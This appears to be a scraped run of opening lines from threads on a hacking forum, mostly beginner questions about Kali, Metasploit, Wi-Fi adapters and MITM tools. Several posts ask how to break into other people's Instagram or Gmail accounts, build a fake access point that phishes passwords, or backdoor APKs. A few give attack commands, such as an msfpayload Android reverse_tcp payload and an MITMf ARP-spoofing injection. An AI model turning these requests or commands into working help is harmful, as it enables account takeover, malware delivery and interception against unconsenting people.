I was using metasploit atutorsqli exploit when I came across an error. This has been bugging me and bugging me and I can't seem to figure this out anybody got a clue.
Hello everybody! I'm pretty new here, so you probably won't recognize me. However, I am currently writing on a How-To about mitmproxy and after a couple of hours I realized that this article is a Forum Thread though I'm sure that I clicked at How To. I just want to make sure whether this is something usual or if I do something wrong.
First of all, I read the article on how to tell if you've been hacked (I didn't NEED to read it, I beyond know) but I'm trying to contact the author OCCUPYTHEWEB; he says he obviously has email and can be contacted there but when I click on his name it just takes me back to wonderhowto.com.
This is online card game and available in play store.The sever is Myanmar and it may be easy to hack but I don't know how to hack.So somebody help me to get coin 1000B and gem 500000. Please give me the link to hack or the hacked apk for this game. Thanks.
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
Then that i read this: https://null-byte.wonderhowto.com/forum/kali-linux-tp-link-tl-wn722n-v2-driver-not-working-0177837/
Hey, i am trying to hack into a instagram account. If i hack into the gmail of that person, i can do it.
Hey Everyone, I'm new to the community and new to hacking in general. I'm a complete newbie trying to learn the ropes. So hero is my question, I recently decided to use Linux as my OS. I have successfully downloaded it and created a USB Drive. I'm having a bit of trouble accessing / enabling the Wifi once on Linux. Can anyone provide any answers or suggestions?
Hi, i bought a new tp-link Tl WN722N V.2 wifi dongle for wifi hacking but when typed ifconfig, there is no wlan0 interface,so i checked if the system is even detecting my usb by typing # lsusb but there was no mention of the chipset or vendor name, just some ID 2357:010c. First i typed # lsusb without the usb and the i typed it after plugging in the usb. I searched a lot of forums but none of them worked for me. Im am runing kali 2017.1 live with persistence on a usb. The Linux version is 4.9...
Hi! I want to install Ferret Sidejack in Kali, I followed this tutorial but I have a problem
Hey guyz, i recently found out that instagram accounts can be hacked by dictionary attacks(Noob here) and so i found out the scripts online and tried them. i found this python script .
I have been wondering if it is possible to make a fake ap with airbase-ng and instead of capturing packets, i would be changing them, so I would redirect a client connected to the fake ap to any website I choose. for example, someone connects to my fake ap and clicks a login button but instead of going to the real page they are sent a packet containing a fake login page that steals passwords.
Please help everyone, one of my friends facebook got hacked. That guy first sent her request from another hacked account and did social engineering on my friend , and convienced her to give her password and also convienced to make her send some of her pics( you know what i mean) she gave her account details and that guy now is send all her pic to her friends. And he also hacked her gmail account, she neve gave her gmail account details.
Hi. I followed this guide http://null-byte.wonderhowto.com/how-to/hack-like-pro-get-even-with-your-annoying-neighbor-by-bumping-them-off-their-wifi-network-undetected-0147206/
I have changed ISP and come to realize they do not offer Port Forwarding. I spoke to support staff at my ISP and was told I would need an additional router, and any other options would need to be advised by an IT-expert. Since that is beyond their knowledge. I was hoping you have a solution for me to port forward my router without having to buy another one.
is there any way to "hack" and television? not a normal one, but a smart, since it is connected to the wifi?
For those of you that know me, you know that every time I make a post in the forum sections, I usually complain about my MITM attack not working. Well guess what...I fixed it! I didn't even have to buy a wireless adapter for my virtual machine. I read forums for months, and I found one that helped me solve my problem. Apparently, arpspoofing is having trouble processing requests with the virtual mac address, so all I did was use macchanger to change my mac address to that of my host.
Hi guys, how do i use the vulnerabilities of this site? Can one of these vulnerabilities be used to hack the site? (I have permission for testing the site)
how can I stay as anonymous as humanly possible using tails what I was thinking was, 1.Buying laptop cash and the removing hard drive, mic, camera, and speakers
Everytime I type in "airmon-ng start wlan0" the following error comes up: " wlan0 is hard blocked, please flip the hardware wifi switch to on.
I have written a Java backdoor available at http://pastebin.com/2nYicFPM, If you have any questions, please comment and I will update the tutorial on the part you find difficult to understand. This is due the code being long and it just makes it easier to explain the harder parts of it only without me having to explain everything.
Hi ! My question is, how to investigate a hacker.
A backdoor in a computer system is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice) or may subvert the system through a rootkit.
I used OTW's tutorial for netcat, managed everything to work. But the CMD with listener on windows is visible and if I close it, the listener gets closed too. Did I miss something? If it has to be done with external script, is there any way other than VBScript?
Step 1: Introduction to Telegram Telegram is a Very secure messenger, and includes a lots of features. One great feature is it's own Bot API
Hi Null-byters, We are much much familiar using our lappy or PC connected to an external Wi-Fi adapter and then place it in monitor mode to capture the packets and handshake which can later be decrypted using a proper brute force to obtain the password or using Reaver etc..to capture WEP enabled wifi's.
So I've been looking at a tutorial on how to sniff a target computer using MITMf and I have run into an issue. I downloaded the framework from the repositories in the kali distro I am running. And do not have any issues running the attack, however when I run this command
Hello guys, the answer might be obvious to some, but i'm lost right now. I made a payload with Veil-Evasion it's reversetcp and i used aesencrypt and xor encoder, i tried binding it with another program using Shellter (binding with no errors) and when i run it on my computer the meterpreter sessions doesn't work, i used the payload by itself on my virtual machine and it worked perfectly.
Ok so i have a little problem that require a little solution ... i installed Cobalt Strike on Kali linux 2.0 i want to make a fake link so if the victim clicks on the link and fill in the details i will get the details o my log ...
A few months back, a friend of mine (Call her Remi) had a guest at her house who was looking for a quick buck (Let's call him Jack). Jack discovers a craigslist add, asking people to SELL their facebook accounts.(Instant red-flag for anyone with a brain, I think.) So, Jack being a simple mind folk, needing money for whatever simple minded folks need money for, decides to give a stranger his facebook information. After this, I assume Jack's phone was compromised and then my friend's router was...
Hello friends this is my first null-byte, today i am going to explain HOW TO RESET ADMIN PASSWORDS FOR WINDOWS (7,8)
mitmf --spoof --arp -i wlan0 --gateway <gateway> --target <ip> --inject --js-url <beef js> But it is stuck at Config file parsed. When i press Ctrl + C it says ARPpoisoner Restoring connection <target> <-> <ip> with 2 packets per host
Hey new to the whole hacking thing. I was wondering if in kali or any other Linux distro if there is a way for your computer to change its route on proxies every few hours or minutes or even seconds. So is it possible to make a list of proxies you approve and tell it to switch between them in blank amount of time? Thanks this is also my first post :D
when i try go put a backdoor into a legit apk it takes 2/3 hours to decompile it and it even fails I'm new to linux,I've been using windows also
I tried to use hydra i run this commands on Gmail and on Yahoo and it does not work for me maybe someone have an explanation ...
Looking for a how to for this. I looked up everywhere and couldn't find anything straight forward. Is there any way that we can embed our metasploit android payload into .3gp or .mp4 file to make StageFright exploit work?